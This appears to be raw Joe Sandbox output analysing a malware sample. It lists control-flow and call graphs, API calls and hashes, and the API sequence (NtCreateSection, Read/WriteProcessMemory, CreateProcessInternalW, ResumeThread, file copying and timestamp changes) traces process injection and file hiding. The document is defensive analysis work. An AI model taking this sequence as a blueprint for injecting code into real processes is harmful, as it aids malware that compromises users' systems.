                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 297 4018b1-4018b3 298 401903-40190b call 4013cc 297->298 299 4018b5-4018c3 297->299 306 40191a-401920 298->306 307 40190d-401915 call 4014bf 298->307 302 4018d4 299->302 303 4018c8-401900 call 401164 Sleep 299->303 302->303 303->298 312 401931 306->312 313 401928-40192d 306->313 307->306 312->313 316 401934-40194f 312->316 313->316 322 401952-40195b call 401164 316->322 323 401948-40194b 316->323 323->322
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                              • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                                                                                                                              • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 326 4018c2-40190b call 401164 Sleep call 4013cc 338 40191a-401920 326->338 339 40190d-401915 call 4014bf 326->339 342 401931 338->342 343 401928-40192d 338->343 339->338 342->343 344 401934-40194f 342->344 343->344 349 401952-40195b call 401164 344->349 350 401948-40194b 344->350 350->349
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4152845823-0
                                                                                                                                                                                                                              • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                                                                                              • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 353 4018da-40190b call 401164 Sleep call 4013cc 360 40191a-401920 353->360 361 40190d-401915 call 4014bf 353->361 364 401931 360->364 365 401928-40192d 360->365 361->360 364->365 366 401934-40194f 364->366 365->366 371 401952-40195b call 401164 366->371 372 401948-40194b 366->372 372->371
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4152845823-0
                                                                                                                                                                                                                              • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                                                                                              • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                                                                                                                              • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                                                                                                                              • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                                                                                                                              • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                                                                                                                              • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                                                                                                                              • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                                                                                                                              • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                                                                                                                                                                                                                              • Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                                                                                                                              • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:59.3%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:10.6%
                                                                                                                                                                                                                              Total number of Nodes:142
                                                                                                                                                                                                                              Total number of Limit Nodes:6
                                                                                                                                                                                                                              execution_graph 1134 3441952 1137 3441980 1134->1137 1147 34419d0 1137->1147 1140 3441973 1141 344199b SleepEx 1141->1141 1142 34419ab 1141->1142 1153 34421c4 1142->1153 1148 3441a07 1147->1148 1149 3441ad0 RtlCreateHeap 1148->1149 1152 3441992 1148->1152 1150 3441b01 1149->1150 1151 3441c80 CreateThread CloseHandle CreateThread 1150->1151 1150->1152 1151->1152 1171 3443bf4 1151->1171 1179 3443cd0 1151->1179 1152->1140 1152->1141 1154 34421e2 1153->1154 1182 3444a40 1154->1182 1156 34419c0 1157 3441d8c 1156->1157 1188 3444c90 1157->1188 1159 3441dc7 1160 3441df8 CreateMutexExA 1159->1160 1161 3441e12 1160->1161 1192 3444e00 1161->1192 1163 3441e51 1197 3441f04 1163->1197 1168 3441ebe 1169 3441ee9 SleepEx 1168->1169 1209 344226c 1168->1209 1215 3442cd0 1168->1215 1169->1168 1169->1169 1172 3443c11 CreateToolhelp32Snapshot 1171->1172 1173 3443cab 1171->1173 1174 3443c25 Process32First 1172->1174 1175 3443c93 SleepEx 1172->1175 1176 3443c3d 1174->1176 1175->1172 1175->1173 1177 3443c8a CloseHandle 1176->1177 1178 3443c78 Process32Next 1176->1178 1177->1175 1178->1176 1180 3443d06 1179->1180 1181 3443ce2 EnumWindows SleepEx 1179->1181 1181->1180 1181->1181 1183 3444a69 1182->1183 1184 3444a7d GetTokenInformation 1183->1184 1187 3444ada 1183->1187 1185 3444aa8 1184->1185 1186 3444ab2 GetTokenInformation 1185->1186 1186->1187 1187->1156 1189 3444cbd GetVolumeInformationA 1188->1189 1191 3444d10 1189->1191 1191->1159 1195 3444e22 1192->1195 1193 3444ede ObtainUserAgentString 1193->1163 1194 3444e63 RegQueryValueExA 1194->1195 1195->1194 1196 3444eb6 1195->1196 1196->1193 1198 3441f27 1197->1198 1199 3441e7d CreateFileMappingA 1198->1199 1200 344203e 1198->1200 1201 3441f8b DeleteFileW CopyFileW 1198->1201 1199->1168 1223 3443490 1200->1223 1201->1199 1202 3441fab DeleteFileW 1201->1202 1205 3441fc1 1202->1205 1204 344205b CreateFileW 1204->1199 1206 3441ff6 DeleteFileW 1205->1206 1207 344200a 1206->1207 1229 3444920 1207->1229 1210 344229d 1209->1210 1236 34432ec CreateFileW 1210->1236 1212 34422b2 1240 344230c 1212->1240 1214 34422c3 1214->1168 1216 34432ec 2 API calls 1215->1216 1217 3442cf3 1216->1217 1218 3442f55 1217->1218 1219 3442f34 SleepEx 1217->1219 1222 3442efa ResumeThread 1217->1222 1278 3444578 1217->1278 1282 3442fac 1217->1282 1218->1168 1219->1217 1219->1218 1222->1217 1224 34434b1 1223->1224 1225 34434d1 GetUserNameW 1224->1225 1226 34434f2 1225->1226 1234 34435e8 CoCreateInstance 1226->1234 1228 344350d 1228->1204 1230 3444947 1229->1230 1231 3444967 SetFileAttributesW CreateFileW 1230->1231 1232 34449b2 SetFileTime 1231->1232 1233 34449d3 1232->1233 1233->1200 1235 3443646 1234->1235 1237 344338f 1236->1237 1238 3443341 1236->1238 1237->1212 1238->1237 1239 3443360 ReadFile 1238->1239 1239->1237 1264 3443de0 1240->1264 1242 344279d 1244 3443de0 RtlReAllocateHeap 1242->1244 1243 34425b8 1245 34426f9 1243->1245 1255 3442657 1243->1255 1259 34425d0 1243->1259 1249 34427c4 1244->1249 1247 3443de0 RtlReAllocateHeap 1245->1247 1246 344235f 1248 34424df DeleteFileW CreateFileW 1246->1248 1251 34426b8 1246->1251 1263 3442594 1246->1263 1252 3442720 1247->1252 1256 3442522 1248->1256 1248->1263 1250 3442840 RtlReAllocateHeap 1249->1250 1249->1251 1250->1251 1251->1214 1252->1251 1254 3442840 RtlReAllocateHeap 1252->1254 1253 3443de0 RtlReAllocateHeap 1253->1259 1254->1251 1255->1251 1257 3443de0 RtlReAllocateHeap 1255->1257 1258 344255b WriteFile 1256->1258 1257->1251 1261 3442582 1258->1261 1259->1251 1259->1253 1259->1255 1268 3442840 1259->1268 1262 3444920 3 API calls 1261->1262 1262->1263 1263->1242 1263->1243 1265 3443e0f 1264->1265 1274 3443f7c 1265->1274 1267 3443f2f 1267->1246 1269 3442849 1268->1269 1271 3442c63 1268->1271 1270 3443f7c RtlReAllocateHeap 1269->1270 1273 3442948 1269->1273 1270->1273 1271->1259 1272 3443de0 RtlReAllocateHeap 1272->1271 1273->1271 1273->1272 1275 3443fc6 1274->1275 1276 3443fbf 1274->1276 1275->1276 1277 34442af RtlReAllocateHeap 1275->1277 1277->1275 1279 34445a8 1278->1279 1280 344461c CreateProcessInternalW 1279->1280 1281 344466f 1280->1281 1281->1217 1283 3442fe3 1282->1283 1296 34432ae 1283->1296 1301 3444760 1283->1301 1286 3444760 NtCreateSection 1287 344305b 1286->1287 1288 3444760 NtCreateSection 1287->1288 1287->1296 1289 344308a 1288->1289 1290 3444760 NtCreateSection 1289->1290 1291 34430da 1290->1291 1292 34431b8 NtQueryInformationProcess 1291->1292 1293 3443198 NtQueryInformationProcess 1291->1293 1294 34431df 1292->1294 1293->1294 1295 34431e7 ReadProcessMemory 1294->1295 1294->1296 1305 3445328 1295->1305 1298 3443212 ReadProcessMemory 1299 3443236 1298->1299 1300 344329f WriteProcessMemory 1299->1300 1300->1296 1302 3444793 1301->1302 1304 344302b 1301->1304 1303 34447b1 NtCreateSection 1302->1303 1302->1304 1303->1304 1304->1286

                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                              callgraph 0 Function_034421C4 2 Function_03444A40 0->2 1 Function_03441045 5 Function_034452CC 2->5 17 Function_034453D8 2->17 57 Function_03445328 2->57 3 Function_034443C0 38 Function_03445384 3->38 3->57 4 Function_03442840 4->5 7 Function_03444FC8 4->7 8 Function_03445348 4->8 15 Function_034450DC 4->15 16 Function_034439DC 4->16 19 Function_03443DE0 4->19 33 Function_03443F7C 4->33 51 Function_03444F1C 4->51 4->57 6 Function_0344354C 6->5 6->51 6->57 9 Function_034411D4 31 Function_034413F4 9->31 10 Function_03441456 11 Function_034419D0 11->5 12 Function_03443CD0 11->12 28 Function_03443BF4 11->28 46 Function_03441D08 11->46 11->51 52 Function_03444B1C 11->52 13 Function_03442CD0 13->5 13->7 23 Function_034432EC 13->23 36 Function_03444578 13->36 45 Function_03444D8C 13->45 56 Function_03442FAC 13->56 13->57 14 Function_03441952 40 Function_03441980 14->40 16->8 48 Function_03443A94 16->48 18 Function_03444BE4 19->5 19->33 19->38 19->57 62 Function_034448B0 19->62 20 Function_03444760 20->17 21 Function_03444860 22 Function_03441062 23->5 23->7 23->51 23->57 24 Function_034417EC 25 Function_0344226C 25->5 25->23 43 Function_0344230C 25->43 26 Function_034435E8 26->5 26->51 27 Function_03445368 47 Function_03444714 28->47 60 Function_034450B0 28->60 29 Function_03445174 30 Function_03445274 32 Function_03441175 33->3 33->5 33->7 33->27 33->30 33->38 33->51 33->57 59 Function_03444434 33->59 34 Function_0344177C 35 Function_034449FC 36->5 36->51 36->57 37 Function_03441F04 37->5 37->45 50 Function_03443490 37->50 37->51 53 Function_03444920 37->53 37->57 39 Function_03444E00 39->5 39->15 39->51 40->0 40->11 44 Function_03441D8C 40->44 41 Function_03441501 42 Function_03441803 43->4 43->5 43->7 43->8 43->15 43->19 43->27 43->51 43->53 54 Function_034446A0 43->54 44->5 44->13 44->25 44->30 44->37 44->39 49 Function_03444C90 44->49 44->51 44->57 61 Function_034453B0 44->61 45->7 45->57 46->52 49->5 49->29 49->51 49->57 50->5 50->6 50->26 50->57 51->7 51->57 52->18 52->60 53->5 53->57 54->47 55 Function_03443D20 55->17 55->47 55->60 56->5 56->7 56->20 56->21 56->48 56->57 58 Function_03446229 62->38 63 Function_03441938

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03444760: NtCreateSection.NTDLL ref: 034447D2
                                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 034431A2
                                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 034431CA
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32 ref: 034431FD
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32 ref: 0344322B
                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32 ref: 034432A8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1349948393-0
                                                                                                                                                                                                                              • Opcode ID: 45eb5f97849bc5aafbf8ae00a7cc210e00dda27831372b457ac5c7141c8219ad
                                                                                                                                                                                                                              • Instruction ID: 912b7869c5d189c7244e469b1a5e3a5510faf7476253ab905fe5c4bce281acbe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45eb5f97849bc5aafbf8ae00a7cc210e00dda27831372b457ac5c7141c8219ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4B18035A18A0C8FDB58EF68D4456ADB3E1FB98710F14427ED84AE7245EF30E9068BC5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 142 3443bf4-3443c0b 143 3443c11-3443c23 CreateToolhelp32Snapshot 142->143 144 3443cab-3443cc4 142->144 145 3443c25-3443c3b Process32First 143->145 146 3443c93-3443ca5 SleepEx 143->146 147 3443c86-3443c88 145->147 146->143 146->144 148 3443c3d-3443c54 call 34450b0 147->148 149 3443c8a-3443c8d CloseHandle 147->149 152 3443c56-3443c58 148->152 149->146 153 3443c6c-3443c73 call 3444714 152->153 154 3443c5a-3443c68 152->154 157 3443c78-3443c80 Process32Next 153->157 154->152 155 3443c6a 154->155 155->157 157->147
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2482764027-0
                                                                                                                                                                                                                              • Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                                                                                                                                                                                              • Instruction ID: 29b17538a18bef6b1e5262a08cb6eac57ab175baf84a1f898513ebd73896a4ee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62212434218A088FFB18EF64C0887AAB3E2FB88305F084A7FD40FDE284DB3485568715

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 264 3444760-344478d 265 3444793-34447ab call 34453d8 264->265 266 344483b-344483c 264->266 270 34447b1-34447db NtCreateSection 265->270 271 3444832-3444835 265->271 267 344483e-3444857 266->267 272 3444825-3444827 270->272 273 34447dd-34447df 270->273 274 3444837-3444838 271->274 275 3444829-3444830 271->275 272->274 272->275 273->274 276 34447e1-34447e5 273->276 274->266 277 34447e7-344481d 275->277 276->277 277->274 279 344481f-3444823 277->279 279->267
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateSection
                                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                                              • API String ID: 2449625523-149943524
                                                                                                                                                                                                                              • Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                                                                                                                                                                                              • Instruction ID: 73d603421511e92682f2345bc063f488473e3fbf33649423008b84d777576d60
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4318AB4908B498FDB94EF59888466ABBE4FB58305F10067FE85AE7350DB30D840CB85

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 535 34435e8-3443640 CoCreateInstance 536 3443646-344369a 535->536 537 34439b7-34439d3 535->537 539 34436a0-34436bd 536->539 540 34439ac-34439b2 536->540 539->540 542 34436c3-34436df 539->542 540->537 544 34436e5-34436fb 542->544 545 34439a1-34439a7 542->545 544->545 547 3443701-3443770 544->547 545->540 555 3443994-344399c 547->555 556 3443776-344378c 547->556 555->545 558 3443792-34437ac 556->558 559 3443839-344385f 556->559 558->559 562 34437b2-3443834 call 3444f1c * 2 call 34452cc * 2 558->562 565 3443861-3443880 559->565 566 344389e-34438ef 559->566 562->559 565->566 571 3443882-344388b 565->571 582 34438f5-3443973 566->582 583 344397f-344398f 566->583 574 3443893-3443899 571->574 574->566 582->583 583->555
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 542301482-0
